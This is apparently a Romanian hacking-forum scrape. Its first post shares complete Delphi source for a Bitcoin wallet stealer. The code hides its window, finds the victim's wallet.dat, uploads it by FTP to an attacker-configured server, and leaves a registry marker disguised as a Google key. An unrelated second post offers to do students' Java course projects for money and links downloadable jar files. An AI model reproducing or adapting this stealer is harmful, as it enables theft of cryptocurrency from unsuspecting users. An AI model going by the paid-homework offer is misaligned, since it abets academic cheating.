Ce parere aveti despre wallet stealer-ul asta https://leakforums.org/thread-232703 program dbs; // Bitcoin Stealer // developed by Jimmy // for http://exclusivehackingtools.blogspot.com {$IF CompilerVersion >= 21.0} {$WEAKLINKRTTI ON} {$RTTI EXPLICIT METHODS([]) PROPERTIES([]) FIELDS([])} {$IFEND} uses Windows, System.SysUtils, System.Classes, ShlObj, IdFTP, Registry; // Function to set the window state hidden function GetConsoleWindow: HWND; stdcall; external kernel32 name 'GetConsoleWindow'; // Function to get the AppData path function AppDataPath: String; const SHGFP_TYPE_CURRENT = 0; var Path: array [0 .. MAXCHAR] of char; begin SHGetFolderPath(0, CSIDL_LOCAL_APPDATA, 0, SHGFP_TYPE_CURRENT, @path[0]); Result := StrPas(Path); end; // Function to check a file size function FileSize(FileName: wideString): Int64; var sr: TSearchRec; begin if FindFirst(FileName, faAnyFile, sr) = 0 then Result := Int64(sr.FindData.nFileSizeHigh) shl Int64(32) + Int64(sr.FindData.nFileSizeLow) else Result := -1; FindClose(sr); end; // Function to generate random string function RandomString(PLen: Integer): string; var str: string; begin Randomize; str := 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; Result := ''; repeat Result := Result + str[Random(Length(str)) + 1]; until (Length(Result) = PLen); end; // ============================================================================ var Debug: Boolean; FTP: TIdFTP; REG: TRegIniFile; RegPath, RegValue, RegCurrentValue, Path, UploadPath, FileName: String; Error: String; begin // The window should be hidden without using this API ShowWindow(GetConsoleWindow, SW_HIDE); // Debug or build release ? Debug := True; // Set registry key value (random) RegValue := '6556'; // At the end of the first execution we will write a key in the registry. // Now we will try check if the key exists. If yes, it means // that the wallet has already be stolen. Avoid useless duplicates. try REG := TRegIniFile.Create; REG.RootKey := HKEY_CURRENT_USER; REG.OpenKeyReadOnly('Software'); RegCurrentValue := REG.ReadString('Google', 'Version', ''); REG.CloseKey; REG.Free; except end; // Check if wallet has been already stolen (to avoid duplicates) if not(RegCurrentValue = RegValue) then begin try // Generate path to Bitcoin wallet file if Win32MajorVersion >= 6 then // Microsoft Windows Vista and newer Path := ExpandFileName(AppDataPath + '\..\Roaming\Bitcoin\wallet.dat') else // Microsoft Windows XP Path := ExpandFileName(AppDataPath + '\..\Bitcoin\wallet.dat'); // If wallet file exists, check the FileSize (skip large file > 10MB) if FileExists(Path) then if FileSize(Path) < 10000000 then begin // Generate a random filename FileName := RandomString(20) + '.dat'; // Initialize upload via Indy FTP component FTP := TIdFTP.Create(); FTP.ConnectTimeout := 20000; FTP.ReadTimeout := 20000; // Setup with your FTP details FTP.Host := 'ftp.host.com'; FTP.Username := 'username'; FTP.Password := 'password'; UploadPath := 'www/'; // Connect and upload if not Debug then begin FTP.Connect; FTP.Put(Path, UploadPath + FileName); end; // After upload attempt, disconnect and free the FTP component FTP.Quit; FTP.Disconnect; FTP.Free; // Try to add a key to registry to avoid double execution try REG := TRegIniFile.Create; REG.RootKey := HKEY_CURRENT_USER; REG.OpenKey('Software', True); REG.WriteString('Google', 'Version', RegValue); REG.CloseKey; REG.Free; except end; end; except // Catch error, you never know... on E: Exception do Error := E.ClassName + ': ' + E.Message; end; end; end.

Avand in vedere ca pentru studenti incepe sesiunea, si unii au proiecte in java, sunt dispus sa fac proiectele altora contra-cost. Pana in momentul de clasa, am facut bomberman, snake, si 2 "meniuri" pentru un restaurant, respectiv magazin de elctrocasnice. Bomberman jar : http://www30.zippyshare.com/v/srNVgVii/file.html Snake jar : http://www30.zippyshare.com/v/IdOwDMjo/file.html